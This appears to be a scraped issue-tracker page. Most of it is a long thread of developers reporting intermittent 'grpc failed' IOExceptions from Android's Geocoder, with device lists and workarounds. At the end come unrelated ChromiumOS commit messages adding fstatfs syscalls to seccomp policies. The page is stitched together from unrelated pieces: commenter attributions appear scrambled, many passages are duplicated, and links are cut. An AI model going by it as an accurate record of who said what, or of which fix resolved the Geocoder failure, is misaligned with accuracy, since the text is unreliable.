Fixed
Status Update
No update yet.
Comments
[Deleted User] <[Deleted User]>
Same problem, but not only with simulator.
[Deleted User] <[Deleted User]>
Suffering same issue. java.io.IOException: grpc failed after calling geocoder.getFromLocation()
It happens on all emulator APIs I've tried (API levels tested were 23, 24, 25 using x86_64 Google APIs images and API 26 using x86 Google APIs ) Real devices seem to work fine. Definitely a more recent issue since my app is many years in development and this was not always a problem. My app falls back to usehttps://maps.googleapis.com/maps/api/geocode/json?latlng=. .. but this is a quota limited API and slow.
It happens on all emulator APIs I've tried (API levels tested were 23, 24, 25 using x86_64 Google APIs images and API 26 using x86 Google APIs ) Real devices seem to work fine. Definitely a more recent issue since my app is many years in development and this was not always a problem. My app falls back to use
aa...@google.com
This is working for me on all of my emulator APIs that were previously failing a couple of days ago (21 through 25). Just curious - does anyone know how the fix was delivered? I didn't manually update my Android software.
ra...@chromium.org
I can confirm that the problem has gone away for me also without any change to my virtual devices.
aa...@google.com
Suffering same issue. java.io.IOException: grpc failed after calling geocoder.getFromLocationName().
Note that the other method call (getFromLocation()) is working fine. From what I noticed, the issue seems to be related to Google Play Services installed on the device. I tried using the geolocator with PlayServices 11.5.09 and I get the grpc failed error. If I rollback to the factory version of Play Services (i.e. uninstalling updates), Geocoder's method "getFromLocationName" works again.
Note that the other method call (getFromLocation()) is working fine. From what I noticed, the issue seems to be related to Google Play Services installed on the device. I tried using the geolocator with PlayServices 11.5.09 and I get the grpc failed error. If I rollback to the factory version of Play Services (i.e. uninstalling updates), Geocoder's method "getFromLocationName" works again.
aa...@google.com
I have checked back, as #4 mentioned, the problem on the emulator seems to be fixed and must been a server side issue or as #6 mentioned a problem with Google Play Services. I haven't had problems on my real device, but results might differ, as I was testing using Huawei P9 Plus.
ja...@google.com
Thank you for reporting this issue. Can you please provide the below requested information to better understand the issue:
Steps to reproduce
Please provide source code or apk of a sample application to reproduce the issue.
Also kindly mention the steps to be followed for reproducing the issue with the given sample application.
Frequency
How frequently does this issue occur? (e.g 100% of the time, 10% of the time)
Steps to reproduce
Please provide source code or apk of a sample application to reproduce the issue.
Also kindly mention the steps to be followed for reproducing the issue with the given sample application.
Frequency
How frequently does this issue occur? (e.g 100% of the time, 10% of the time)
ja...@google.com
Hi ar...@google.com, I too have this same issue. You shall refer to the screenshots shared by #1, it is exactly where the issue is coming. For me, this issue is inconsistent as it is working in some of Android 5.x devices and not in other devices. My customers started complaining this issue and things are going crazy here. Searching for a solution, pls help. I think it is not working when the play services is updated to latest version.
[Deleted User] <[Deleted User]>
I am not sure of this will help a lot, but there might be one of the following reasons that caused this problem (at least in my case):
So, I noticed that, this problem started to happen after :
- started my app on an emulator (before I had no problem with this)
- or from the last google-services update (did work fine before)
I am in this kind of problem right now also, but it fails on real device.
Notice: It doesn't always fail, just sometimes (kind of randomly, for instance I had a case in which it started working after a fail, without any app / device restart)
So, I noticed that, this problem started to happen after :
- started my app on an emulator (before I had no problem with this)
- or from the last google-services update (did work fine before)
I am in this kind of problem right now also, but it fails on real device.
Notice: It doesn't always fail, just sometimes (kind of randomly, for instance I had a case in which it started working after a fail, without any app / device restart)
aa...@google.com
I also got same issue.. LocationManager.getFromLocation(latitude, longitude,maxresults,params,results ) gives gprc failed on Oppo real time mobile device.If you get any solution, please give me the answer.
.
.
ja...@google.com
I am running into the same issue as well. If I run it on simulator then no issue, but if I run it on device then there is an issue. I am using Samsung S7
aa...@google.com
This issue is really crazy, is there any other alternative solutions?
jo...@chromium.org
I am running into the same issue as well on real device, Services Google Play Version 11.9.75 ( 240-182402865)
aa...@google.com
please try to fix this blocker issue ASAP.
as there is lot of people complaining about it.
as there is lot of people complaining about it.
ll...@google.com
I am running into the same issue as well on HUAWEI PRA-LX1 (Android 7.0, API 24).
ma...@chromium.org
Hi all, I have been inactive on this thread for sometime, but i guess the fix hasn't really been implemented for all environments based on the comments here. Please include your current google play service version and as much environment information possible to help find a solution or workaround of possible. I hope that is issue is escalated to either a P1 or P2 issue.
ma...@chromium.org
Facing same problem on Samsung J7 2016
jo...@chromium.org
ar...@google.com, is...@google.com
Here are the exact steps to reproduce this problem. There are totally 3 ways to reproduce the same problem.
Case 1:
1- Restarted my phone Redmi 3s.
2- Turned GPS On, Wifi On and the Mobile Data Off.
3- Wifi is not connected to any Network. So basically No Internet Connectivity.
This led to IOException: grpc failed.
Case 2:
1- Turned Wifi On and GPS, Mobile Data both were Turned Off.
2- Wifi is not connected to any Network. So basically No Internet Connectivity.
This led to IOException: grpc failed.
Case 3:
1- Turned On Wifi, GPS and Mobile Data.
2- Wifi is not connected to any Network and also Mobile Data has Low or Mostly No Connectivity.
This led to IOException: grpc failed.
Case 4:
1- Turned Off Wifi, GPS and Mobile Data.
This led to IOException: grpc failed.
Case 5:
1- Turned Off Wifi and Mobile Data while GPS was Turned On.
This led to IOException: grpc failed.
Google Play Services: Version- 14.3.66 (040406-213742215)
Mobile Phones Used: Redmi 3s(Android 6.0.1-Marshmellow), Oppo F1s(Android 5.1-Lollypop)
Here are the exact steps to reproduce this problem. There are totally 3 ways to reproduce the same problem.
Case 1:
1- Restarted my phone Redmi 3s.
2- Turned GPS On, Wifi On and the Mobile Data Off.
3- Wifi is not connected to any Network. So basically No Internet Connectivity.
This led to IOException: grpc failed.
Case 2:
1- Turned Wifi On and GPS, Mobile Data both were Turned Off.
2- Wifi is not connected to any Network. So basically No Internet Connectivity.
This led to IOException: grpc failed.
Case 3:
1- Turned On Wifi, GPS and Mobile Data.
2- Wifi is not connected to any Network and also Mobile Data has Low or Mostly No Connectivity.
This led to IOException: grpc failed.
Case 4:
1- Turned Off Wifi, GPS and Mobile Data.
This led to IOException: grpc failed.
Case 5:
1- Turned Off Wifi and Mobile Data while GPS was Turned On.
This led to IOException: grpc failed.
Google Play Services: Version- 14.3.66 (040406-213742215)
Mobile Phones Used: Redmi 3s(Android 6.0.1-Marshmellow), Oppo F1s(Android 5.1-Lollypop)
ja...@google.com
The issue seems to be related to the connection speed, you can reproduce it easily using the Emulator, set Network type to GPRS, you get every time an grpc failed exception.
jo...@chromium.org
I'm facing same problem. how to resolve that grpc failed and what is the common reason to have that result?
[Deleted User] <[Deleted User]>
change the emulator's network type i just changed it to LTE and its working
ma...@chromium.org
i'm using nokia 5.1+ (Pie) and get same error
ma...@chromium.org
Same. This frequently happens on real devices as well.
[Deleted User] <[Deleted User]>
same issue on pixel 2 XL
[Deleted User] <[Deleted User]>
Same issue on LG-D802 with Android 4.4 and Google Play Services.Maps 16.1.0. Works correctly an Galaxy Nexus and various emulators.
minSdkVersion 14
targetSdkVersion 28
minSdkVersion 14
targetSdkVersion 28
ma...@google.com
Same issue on Nokia 6
AndoridAPIVersion : 27
AndoridAPIVersion : 27
aj...@google.com
same on
minSdkVersion 15
targetSdkVersion 28
minSdkVersion 15
targetSdkVersion 28
ma...@chromium.org
Same issue on Moto e4. Tried geocoder as a service and the same issue.
ma...@chromium.org
same
ma...@chromium.org
Same issue. api 29, pixel emulator
"java.io.IOException: grpc failed
at android.location.Geocoder.getFromLocation(Geocoder.java:136)"
"java.io.IOException: grpc failed
at android.location.Geocoder.getFromLocation(Geocoder.java:136)"
gi...@appspot.gserviceaccount.com
The same issue.
Someone please helps!
Someone please helps!
ja...@google.com
I am facing the same issue -> Service Not Available (Failed to fetch address)
java.io.IOException: grpc failed
java.io.IOException: grpc failed
aj...@google.com
same issue on pixel 2 android 10 device, target sdk is api 28
ja...@google.com
Same issue here.
gi...@appspot.gserviceaccount.com
2 years and still no fix?
gi...@appspot.gserviceaccount.com
I had to turn on Wifi on the emulator to work.
gi...@appspot.gserviceaccount.com
I have the same issue on multiple devices, Samsung S5, A30, A50 and A50S, with different version of API. I used AsyncTask and split it from main thread but it still gives me this error:
W/System.err: java.io.IOException: grpc failed
W/System.err: at android.location.Geocoder.getFromLocation(Geocoder.java:136)
W/System.err: java.io.IOException: grpc failed
W/System.err: at android.location.Geocoder.getFromLocation(Geocoder.java:136)
gi...@appspot.gserviceaccount.com
Same problem
gi...@appspot.gserviceaccount.com
Google API: grpc failed Same issue
gi...@appspot.gserviceaccount.com
Same problem.
At Pixel 2 API 28
At Pixel 2 API 28
gi...@appspot.gserviceaccount.com
Same problem
Huawei p9 Lite
minSdkVersion 21
compileSdkVersion 28
targetSdkVersion 28
play services version :
com.google.android.gms:play-services-location : 17.0.0
Error : java.io.IOException: grpc failed
Huawei p9 Lite
minSdkVersion 21
compileSdkVersion 28
targetSdkVersion 28
play services version :
com.google.android.gms:play-services-location : 17.0.0
Error : java.io.IOException: grpc failed
gi...@appspot.gserviceaccount.com
@Sebastianbaar
Sir,
I'm getting grpc failed while accessing the GeoCoder, can you help me Sir..
i have been tracking your post about these on few years back, but still i could not fix it.
Sorry about my english...
Sir,
I'm getting grpc failed while accessing the GeoCoder, can you help me Sir..
i have been tracking your post about these on few years back, but still i could not fix it.
Sorry about my english...
gi...@appspot.gserviceaccount.com
Suddenly got this issue on Android 10. I have stable internet connection, so it doesn't help. And got this issue first time a week ago, so it's something new.
gi...@appspot.gserviceaccount.com
Same Problem
Honor 9 Lite
Android 9.0.0
minSdkVersion 21
compileSdkVersion 28
targetSdkVersion 28
play services version :
com.google.android.gms:play-services-location : 17.0.0
Error : java.io.IOException: grpc failed
Honor 9 Lite
Android 9.0.0
minSdkVersion 21
compileSdkVersion 28
targetSdkVersion 28
play services version :
com.google.android.gms:play-services-location : 17.0.0
Error : java.io.IOException: grpc failed
gi...@appspot.gserviceaccount.com
compileSdkVersion 29
buildToolsVersion "29.0.3"
minSdkVersion 21
targetSdkVersion 29
Device - Nokia 6.1 plus
Android -10
implementation 'com.google.android.gms:play-services-maps:17.0.0'
implementation 'com.google.android.gms:play-services-location:17.0.0'
issue - It used to work initially but all of a sudden it is not working. Trying to figure it out from past 5 hours but didn't find proper solution. Any solution would be appreciated.
buildToolsVersion "29.0.3"
minSdkVersion 21
targetSdkVersion 29
Device - Nokia 6.1 plus
Android -10
implementation 'com.google.android.gms:play-services-maps:17.0.0'
implementation 'com.google.android.gms:play-services-location:17.0.0'
issue - It used to work initially but all of a sudden it is not working. Trying to figure it out from past 5 hours but didn't find proper solution. Any solution would be appreciated.
gi...@appspot.gserviceaccount.com
java.io.IOException: grpc failed
I am facing this issue also, please let me know if there is any solution.
I am facing this issue also, please let me know if there is any solution.
gi...@appspot.gserviceaccount.com
I m facing this issue on real device.
gi...@appspot.gserviceaccount.com
Yes, this exception is thrown sometime and I don't the reason behind it.
gi...@appspot.gserviceaccount.com
same here
gi...@appspot.gserviceaccount.com
same here on emulator and real device in production. switch airplane mode to off then on resolve the issue but I can't tell my user to do it every time it happens.
gi...@appspot.gserviceaccount.com
same here......
gi...@appspot.gserviceaccount.com
Thank you for your feedback. We assure you that we are doing our best to address all issues reported. For now, we will be closing the issue as won't fix obsolete. If this issue currently still exists, we request that you log a new issue along with the bug report here https://goo.gl/TbMiIO and reference this bug for context.
gi...@appspot.gserviceaccount.com
Reopened on
gi...@appspot.gserviceaccount.com
i Got the same problem with API 28 on emulator ! :(:( sometimes works.. sometimes not..
gi...@appspot.gserviceaccount.com
same here... i finished my project yesterday 12/8/2020 and everything worked fine as i expected but a day after (today 12/9/2020) i get that error whenever i try to retrieve data from geocoder
gi...@appspot.gserviceaccount.com
just had the same problem, I tried all the recommended stuff and nothing. But I deleted the current emulator and created a new one and it worked, I guess the geocoder uses some memory and the previous emulator was full or something.
gi...@appspot.gserviceaccount.com
Hi there,
facing the same issue in irregular cycles on real devices too, sometimes the application works fine in one go, while other times it takes multiple attempt of re-tries. Any sort of help is highly appreciated. thank you!
facing the same issue in irregular cycles on real devices too, sometimes the application works fine in one go, while other times it takes multiple attempt of re-tries. Any sort of help is highly appreciated. thank you!
gi...@appspot.gserviceaccount.com
Any solutions ?
On real devices it happens a lot ..
On real devices it happens a lot ..
gi...@appspot.gserviceaccount.com
This is still a problem
gi...@appspot.gserviceaccount.com
Still a problem!
gi...@appspot.gserviceaccount.com
Even doing it in a background thread, no matter what I still got crash !
PLEASE GOOGLE FIX THIS
PLEASE GOOGLE FIX THIS
gi...@appspot.gserviceaccount.com
Hi All,
This issue thread has already been closed, therefore google might not see your comments.
Unfortunately I don't have access to the code and time to replicate back the issue its been quite long. As #55 has reopened the issuehttps://issuetracker.google.com/issues/168043749 please instead comment and provide the necessary information google is requesting over there.
This issue thread has already been closed, therefore google might not see your comments.
Unfortunately I don't have access to the code and time to replicate back the issue its been quite long. As #55 has reopened the issue
ma...@google.com
This is still an issue even on real devices and it currently happens 90% of the time.
gi...@appspot.gserviceaccount.com
The following revision refers to this bug:
https://chromium.googlesource.com/chromiumos/platform2/+/db571d2030f088c20fad75c127ba6f2cd21e6df5
commit db571d2030f088c20fad75c127ba6f2cd21e6df5
Author: Jordan R Abrahams <ajordanr@google.com>
Date: Mon Aug 23 17:18:50 2021
kerberos: Add fstatfs(64) syscalls to seccomp policies
Due to a local security hardening patch in glibc, we're now
calling fstatfs and fstatfs64 during dlopen. This is crashing
kerberos at present. This commit should fix the issue.
Issue was identified via crash.corp:http://shortn/_IPa2XutpBT
BUG=chromium:1182687
TEST=CQ
Change-Id: I0fe950ab6889ab8c7551d82b9a11f7b6426edd34
Reviewed-on:https://chromium-review.googlesource.com/c/chromiumos/platform2/+/3114474
Reviewed-by: Manoj Gupta <manojgupta@chromium.org>
Reviewed-by: Felipe Andrade <fsandrade@chromium.org>
Tested-by: Jordan R Abrahams <ajordanr@google.com>
Commit-Queue: Felipe Andrade <fsandrade@chromium.org>
[modify]https://crrev.com/db571d2030f088c20fad75c127ba6f2cd21e6df5/kerberos/seccomp/kerberosd-seccomp-amd64.policy
[modify]https://crrev.com/db571d2030f088c20fad75c127ba6f2cd21e6df5/kerberos/seccomp/kerberosd-seccomp-arm.policy
[modify]https://crrev.com/db571d2030f088c20fad75c127ba6f2cd21e6df5/kerberos/seccomp/kerberosd-seccomp-arm64.policy
commit db571d2030f088c20fad75c127ba6f2cd21e6df5
Author: Jordan R Abrahams <ajordanr@google.com>
Date: Mon Aug 23 17:18:50 2021
kerberos: Add fstatfs(64) syscalls to seccomp policies
Due to a local security hardening patch in glibc, we're now
calling fstatfs and fstatfs64 during dlopen. This is crashing
kerberos at present. This commit should fix the issue.
Issue was identified via crash.corp:
BUG=chromium:1182687
TEST=CQ
Change-Id: I0fe950ab6889ab8c7551d82b9a11f7b6426edd34
Reviewed-on:
Reviewed-by: Manoj Gupta <manojgupta@chromium.org>
Reviewed-by: Felipe Andrade <fsandrade@chromium.org>
Tested-by: Jordan R Abrahams <ajordanr@google.com>
Commit-Queue: Felipe Andrade <fsandrade@chromium.org>
[modify]
[modify]
[modify]
gi...@appspot.gserviceaccount.com
The following revision refers to this bug:
https://chromium.googlesource.com/chromiumos/platform2/+/fa7288c6ff9db1539a522bb91f05b8aba56b797e
commit fa7288c6ff9db1539a522bb91f05b8aba56b797e
Author: Jordan R Abrahams <ajordanr@google.com>
Date: Mon Aug 23 17:45:29 2021
ml: Add fstatfs(64) syscalls to seccomp policies
Due to a local security hardening patch in glibc, we're now
calling fstatfs and fstatfs64 during dlopen. This is crashing
ml_service at present. This commit should fix the issue.
Issue was identified via crash.corp:http://shortn/_13ritdxMg6
BUG=chromium:1182687
TEST=CQ
Change-Id: I191504a166c86a847d3440af8fddeea97f31f72f
Reviewed-on:https://chromium-review.googlesource.com/c/chromiumos/platform2/+/3114478
Reviewed-by: Honglin Yu <honglinyu@chromium.org>
Reviewed-by: Xinglong Luan <alanlxl@chromium.org>
Commit-Queue: Manoj Gupta <manojgupta@chromium.org>
Tested-by: Manoj Gupta <manojgupta@chromium.org>
[modify]https://crrev.com/fa7288c6ff9db1539a522bb91f05b8aba56b797e/ml/seccomp/ml_service-HandwritingModel-seccomp-amd64.policy
[modify]https://crrev.com/fa7288c6ff9db1539a522bb91f05b8aba56b797e/ml/seccomp/ml_service-HandwritingModel-seccomp-arm.policy
[modify]https://crrev.com/fa7288c6ff9db1539a522bb91f05b8aba56b797e/ml/seccomp/ml_service-SodaModel-seccomp-amd64.policy
[modify]https://crrev.com/fa7288c6ff9db1539a522bb91f05b8aba56b797e/ml/seccomp/ml_service-SodaModel-seccomp-arm.policy
commit fa7288c6ff9db1539a522bb91f05b8aba56b797e
Author: Jordan R Abrahams <ajordanr@google.com>
Date: Mon Aug 23 17:45:29 2021
ml: Add fstatfs(64) syscalls to seccomp policies
Due to a local security hardening patch in glibc, we're now
calling fstatfs and fstatfs64 during dlopen. This is crashing
ml_service at present. This commit should fix the issue.
Issue was identified via crash.corp:
BUG=chromium:1182687
TEST=CQ
Change-Id: I191504a166c86a847d3440af8fddeea97f31f72f
Reviewed-on:
Reviewed-by: Honglin Yu <honglinyu@chromium.org>
Reviewed-by: Xinglong Luan <alanlxl@chromium.org>
Commit-Queue: Manoj Gupta <manojgupta@chromium.org>
Tested-by: Manoj Gupta <manojgupta@chromium.org>
[modify]
[modify]
[modify]
[modify]
gi...@appspot.gserviceaccount.com
The following revision refers to this bug:
https://chromium.googlesource.com/chromiumos/platform2/+/81be69d9ff9642b8a950a789f2b7dffd6a68e5d1
commit 81be69d9ff9642b8a950a789f2b7dffd6a68e5d1
Author: Jordan R Abrahams <ajordanr@google.com>
Date: Thu Aug 26 16:54:11 2021
smbfs: Add fstatfs(64) to seccomp policies
Due to a local security hardening patch in glibc, we're now
calling fstatfs and fstatfs64 during dlopen. This is crashing
smbfs at present. This commit should fix the issue.
Issue was identified via crash.corp:http://shortn/_Rx9DKe3lUw
BUG=chromium:1182687
TEST=CQ
Change-Id: I2237dac4cc4821c92d19db1e6c8a140e98a41cfd
Reviewed-on:https://chromium-review.googlesource.com/c/chromiumos/platform2/+/3122497
Commit-Queue: Manoj Gupta <manojgupta@chromium.org>
Reviewed-by: Peter Marshall <petermarshall@chromium.org>
Reviewed-by: Manoj Gupta <manojgupta@chromium.org>
Tested-by: Manoj Gupta <manojgupta@chromium.org>
[modify]https://crrev.com/81be69d9ff9642b8a950a789f2b7dffd6a68e5d1/smbfs/seccomp_filters/smbfs-seccomp-amd64.policy
[modify]https://crrev.com/81be69d9ff9642b8a950a789f2b7dffd6a68e5d1/smbfs/seccomp_filters/smbfs-seccomp-arm.policy
[modify]https://crrev.com/81be69d9ff9642b8a950a789f2b7dffd6a68e5d1/smbfs/seccomp_filters/smbfs-seccomp-arm64.policy
commit 81be69d9ff9642b8a950a789f2b7dffd6a68e5d1
Author: Jordan R Abrahams <ajordanr@google.com>
Date: Thu Aug 26 16:54:11 2021
smbfs: Add fstatfs(64) to seccomp policies
Due to a local security hardening patch in glibc, we're now
calling fstatfs and fstatfs64 during dlopen. This is crashing
smbfs at present. This commit should fix the issue.
Issue was identified via crash.corp:
BUG=chromium:1182687
TEST=CQ
Change-Id: I2237dac4cc4821c92d19db1e6c8a140e98a41cfd
Reviewed-on:
Commit-Queue: Manoj Gupta <manojgupta@chromium.org>
Reviewed-by: Peter Marshall <petermarshall@chromium.org>
Reviewed-by: Manoj Gupta <manojgupta@chromium.org>
Tested-by: Manoj Gupta <manojgupta@chromium.org>
[modify]
[modify]
[modify]
gi...@appspot.gserviceaccount.com
The following revision refers to this bug:
https://chromium.googlesource.com/chromiumos/platform2/+/f110fbf8ddca6bc8dc9a4641ba9a40c9cf2b07a6
commit f110fbf8ddca6bc8dc9a4641ba9a40c9cf2b07a6
Author: François Degros <fdegros@chromium.org>
Date: Wed Aug 25 01:57:21 2021
cros-disks: Add fstatfs* to archivemount seccomp policies
A change in glibc will force all systems which load shared libraries to
call the fstatfs or fstatfs64 syscall.
BUG=chromium:1182687
TEST=None
Change-Id: I0d40d57ed541226c9a3e734f5414ff115504e887
Reviewed-on:https://chromium-review.googlesource.com/c/chromiumos/platform2/+/3120767
Reviewed-by: Austin Tankiang <austinct@chromium.org>
Commit-Queue: François Degros <fdegros@chromium.org>
Tested-by: François Degros <fdegros@chromium.org>
[modify]https://crrev.com/f110fbf8ddca6bc8dc9a4641ba9a40c9cf2b07a6/cros-disks/archivemount-seccomp-amd64.policy
[modify]https://crrev.com/f110fbf8ddca6bc8dc9a4641ba9a40c9cf2b07a6/cros-disks/archivemount-seccomp-arm.policy
[modify]https://crrev.com/f110fbf8ddca6bc8dc9a4641ba9a40c9cf2b07a6/cros-disks/archivemount-seccomp-arm64.policy
commit f110fbf8ddca6bc8dc9a4641ba9a40c9cf2b07a6
Author: François Degros <fdegros@chromium.org>
Date: Wed Aug 25 01:57:21 2021
cros-disks: Add fstatfs* to archivemount seccomp policies
A change in glibc will force all systems which load shared libraries to
call the fstatfs or fstatfs64 syscall.
BUG=chromium:1182687
TEST=None
Change-Id: I0d40d57ed541226c9a3e734f5414ff115504e887
Reviewed-on:
Reviewed-by: Austin Tankiang <austinct@chromium.org>
Commit-Queue: François Degros <fdegros@chromium.org>
Tested-by: François Degros <fdegros@chromium.org>
[modify]
[modify]
[modify]
gi...@appspot.gserviceaccount.com
The following revision refers to this bug:
https://chromium.googlesource.com/chromiumos/platform/touch_updater/+/97e19f6c183413affb7dbef8b4265234b78f6365
commit 97e19f6c183413affb7dbef8b4265234b78f6365
Author: Jordan R Abrahams <ajordanr@google.com>
Date: Tue Aug 24 20:48:08 2021
Add fstatfs(64) syscalls to seccomp policies
Due to a local security hardening patch in glibc, we're now
calling fstatfs and fstatfs64 during dlopen. This is crashing
dash and kmod at present, which we _suspect_ some of those
crashes may be due to uncaught errors in touch_updater policies,
Crashes were identified via crash.corp
dash:http://shortn/_eLdGeNd8sp
kmod:http://shortn/_IheitZgfkV
BUG=chromium:1182687
TEST=Check CQ for dash seccomp failures during HW tests
Change-Id: Ie2ac28ca6ba84b94139ec65ae52dd8e3e73a9b7f
Reviewed-on:https://chromium-review.googlesource.com/c/chromiumos/platform/touch_updater/+/3116692
Tested-by: Jordan R Abrahams <ajordanr@google.com>
Commit-Queue: Jordan R Abrahams <ajordanr@google.com>
Reviewed-by: Andrew de los Reyes <adlr@chromium.org>
Reviewed-by: Harry Cutts <hcutts@chromium.org>
[modify]https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/etphidiap/policies/amd64/etphidiap.query.policy
[modify]https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/etphidiap/policies/amd64/etphidiap.update.policy
[modify]https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/amd64/elani2chid.query.policy
[modify]https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/amd64/elani2chid.update.policy
[modify]https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/amd64/emrightupdate.query.policy
[modify]https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/amd64/emrightupdate.update.policy
[modify]https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/amd64/eps2pstiap.query.policy
[modify]https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/amd64/eps2pstiap.update.policy
[modify]https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/amd64/g2touch.query.policy
[modify]https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/amd64/g2touch.update.policy
[modify]https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/amd64/gdixupdate.query.policy
[modify]https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/amd64/gdixupdate.update.policy
[modify]https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/amd64/mfsupdate.query.policy
[modify]https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/amd64/mfsupdate.update.policy
[modify]https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/amd64/pixtpfwup.query.policy
[modify]https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/amd64/pixtpfwup.update.policy
[modify]https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/amd64/rmi4update.query.policy
[modify]https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/amd64/rmi4update.update.policy
[modify]https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/amd64/sisupdate.query.policy
[modify]https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/amd64/sisupdate.update.policy
[modify]https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/amd64/wacom_flash.query.policy
[modify]https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/amd64/wacom_flash.update.policy
[modify]https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/amd64/wdt_util.query.policy
[modify]https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/amd64/wdt_util.update.policy
[modify]https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/amd64/zinitixupdate.query.policy
[modify]https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/amd64/zinitixupdate.update.policy
[modify]https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/arm/elani2chid.query.policy
[modify]https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/arm/elani2chid.update.policy
[modify]https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/arm/g2touch.query.policy
[modify]https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/arm/g2touch.update.policy
[modify]https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/arm/gdixupdate.query.policy
[modify]https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/arm/gdixupdate.update.policy
[modify]https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/arm/pixtpfwup.query.policy
[modify]https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/arm/pixtpfwup.update.policy
[modify]https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/arm/rmi4update.query.policy
[modify]https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/arm/rmi4update.update.policy
[modify]https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/arm/wacom_flash.query.policy
[modify]https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/arm/wacom_flash.update.policy
[modify]https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/arm/wdt_util.query.policy
[modify]https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/arm/wdt_util.update.policy
[modify]https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/arm64/g2touch.query.policy
[modify]https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/arm64/g2touch.update.policy
[modify]https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/arm64/rmi4update.query.policy
[modify]https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/arm64/rmi4update.update.policy
[modify]https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/arm64/wacom_flash.query.policy
[modify]https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/policies/arm64/wacom_flash.update.policy
[modify]https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/stupdate/policies/amd64/stupdate.query.policy
[modify]https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/stupdate/policies/amd64/stupdate.read.policy
[modify]https://crrev.com/97e19f6c183413affb7dbef8b4265234b78f6365/stupdate/policies/amd64/stupdate.update.policy
commit 97e19f6c183413affb7dbef8b4265234b78f6365
Author: Jordan R Abrahams <ajordanr@google.com>
Date: Tue Aug 24 20:48:08 2021
Add fstatfs(64) syscalls to seccomp policies
Due to a local security hardening patch in glibc, we're now
calling fstatfs and fstatfs64 during dlopen. This is crashing
dash and kmod at present, which we _suspect_ some of those
crashes may be due to uncaught errors in touch_updater policies,
Crashes were identified via crash.corp
dash:
kmod:
BUG=chromium:1182687
TEST=Check CQ for dash seccomp failures during HW tests
Change-Id: Ie2ac28ca6ba84b94139ec65ae52dd8e3e73a9b7f
Reviewed-on:
Tested-by: Jordan R Abrahams <ajordanr@google.com>
Commit-Queue: Jordan R Abrahams <ajordanr@google.com>
Reviewed-by: Andrew de los Reyes <adlr@chromium.org>
Reviewed-by: Harry Cutts <hcutts@chromium.org>
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
[modify]
gi...@appspot.gserviceaccount.com
The following revision refers to this bug:
https://chromium.googlesource.com/chromiumos/platform2/+/eb0387e68a6a10302ab94b6a1171cefbc0943d2d
commit eb0387e68a6a10302ab94b6a1171cefbc0943d2d
Author: Jordan R Abrahams <ajordanr@google.com>
Date: Mon Aug 30 20:36:09 2021
adbd: Add fstatfs(64) to seccomp filters
Due to a local security hardening patch in glibc, we're now
calling fstatfs and fstatfs64 during dlopen. This is crashing
kmod at present, which we _suspect_ some of those crashes
may be due to missing fstatfs in adbd policies.
Crashes found via crash.corp:http://shortn/_IheitZgfkV
BUG=chromium:1182687
TEST=N/A (we can't repo the issue seen in prod locally or in CQ)
Change-Id: Ie1b9daad72a9b88d564d8f750a9f774ffd8ba6e3
Reviewed-on:https://chromium-review.googlesource.com/c/chromiumos/platform2/+/3131100
Reviewed-by: Manoj Gupta <manojgupta@chromium.org>
Reviewed-by: Yusuke Sato <yusukes@chromium.org>
Commit-Queue: Manoj Gupta <manojgupta@chromium.org>
